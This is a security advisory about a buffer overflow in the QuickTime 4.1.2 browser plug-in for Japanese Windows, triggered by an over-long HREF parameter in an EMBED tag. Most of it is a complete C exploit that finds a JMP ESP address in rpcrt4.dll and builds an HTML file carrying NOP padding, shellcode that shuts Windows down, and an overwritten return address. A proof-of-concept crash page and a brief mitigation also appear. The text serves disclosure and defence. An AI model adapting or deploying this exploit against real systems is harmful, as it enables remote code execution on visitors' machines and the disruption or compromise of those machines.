COMMAND
Quick Time
SYSTEMS AFFECTED
QuickTime Player 4.1.2 for Windows (Japanese)
PROBLEM
'UNYUN' (Shadow Penguin Security) found following. There is a
exploitable buffer overflow bug in quick time plug-in for windows.
This problem occurs when the visitor clicks the shown movie in the
browser. Quick time plug-in doesn't check the length of HREF
parameter in EMBED tag appropriately, Quick time overflows when
the long string is specified in HREF. This buffer overflow
overwrites the local buffer, the codes which are written in the
EMBED tag can be executed in the client host.
If the HTML file which contains the cracking code in EMBED tag is
opened and visitor clicks the shown movie, the cracking code will
be executed on the client host. This overflow contains the
possibility of the virus and trojans infection, sytsem
destruction, intrusion, and so on.
We will explain the details of this problem under the environment
of Windows98 (SE/Japanes) + QuickTime Player 4.1.2 for Windows +
Internet Explorer 5.0. You can check this problem easily by the
following simple HTML file.
<html>
<embed src="c:\program files\quicktime\sample.mov"
href="aaaa... long string (730 characters)"
width=60 height=60 autoplay="true"
target="QUICKTIMEPLAYER">
</html>
* You must prepare a sample movie file to specify in "src"
parameter.
* Write 730 bytes characters in "href" parameter.
Internet Explorer will crash by the buffer overflow when the shown
movie on browser is clicked. You will be able to see that EIP is
0x61616161 in GPF dialog box when Internet Explorer is crashed.
Following sample generates a HTML file which includes the code
which shutdowns Windows by using ExitWindowsEx API. The shutdown
code is written in EMBED tag, and executed by using this buffer
overflow problem. When you check this problem by the following
sample code, you must set appropriate movie file in MOV_FILE (the
movie file "sample. mov" which is written in the following code
is a sample which is installed when Quick Time Player 4.1.2 is
installed by default). This sample code can be compiled by Visual
C++ 6.0. This sample code was checked under the environment of
Windows98 Second Edition (Japanese) + Internet Explorer 5.0.
/*====================================================================
Apple QuickTime 4.1.2 plug-in exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
====================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define MOV_FILE "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT 60
#define WIDTH 60
#define TARGET "QUICKTIMEPLAYER"
#define FILE_IMAGE \
"<html><embed src=\"%s\" href=\"%s\" "\
"width=%d height=%d autoplay=\"true\" "\
"target=\"%s\"><br></html>"
#define BUFSIZE 730
#define RET 684
#define ESP_TGT "rpcrt4.dll"
#define JMPESP_1 0xff
#define JMPESP_2 0xe4
#define NOP 0x90
unsigned char exploit_code[200]={
0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
0xFF,0xD0,0x00,
};
main(int argc,char *argv[])
{
FILE *fp;
char buf[BUFSIZE];
unsigned int i,pretadr,p,ip,kp;
MEMORY_BASIC_INFORMATION meminfo;
if (argc<2){
printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
argv[0]);
exit(1);
}
if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
printf("%s is not found.\n",ESP_TGT);
exit(1);
}
VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
pretadr=0;
for (i=0;i<meminfo.RegionSize;i++){
p=kp+i;
if ( ( p &0xff)==0
|| ((p>>8 )&0xff)==0
|| ((p>>16)&0xff)==0
|| ((p>>24)&0xff)==0) continue;
if ( *((unsigned char *)p)==JMPESP_1
&& *(((unsigned char *)p)+1)==JMPESP_2)
pretadr=p;
}
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("File write error \"%s\"\n",argv[1]);
exit(1);
}
memset(buf,NOP,BUFSIZE);
memcpy(buf+700-12,exploit_code,strlen(exploit_code));
buf[BUFSIZE-2]=0;
ip=pretadr;
printf("EIP=%x\n",ip);
buf[RET ]=ip&0xff;
buf[RET+1]=(ip>>8)&0xff;
buf[RET+2]=(ip>>16)&0xff;
buf[RET+3]=(ip>>24)&0xff;
if (argc==2)
fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
else
fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
fclose(fp);
printf("Done.\n");
}
SOLUTION
Disable the execution of ActiveX control and plug-in.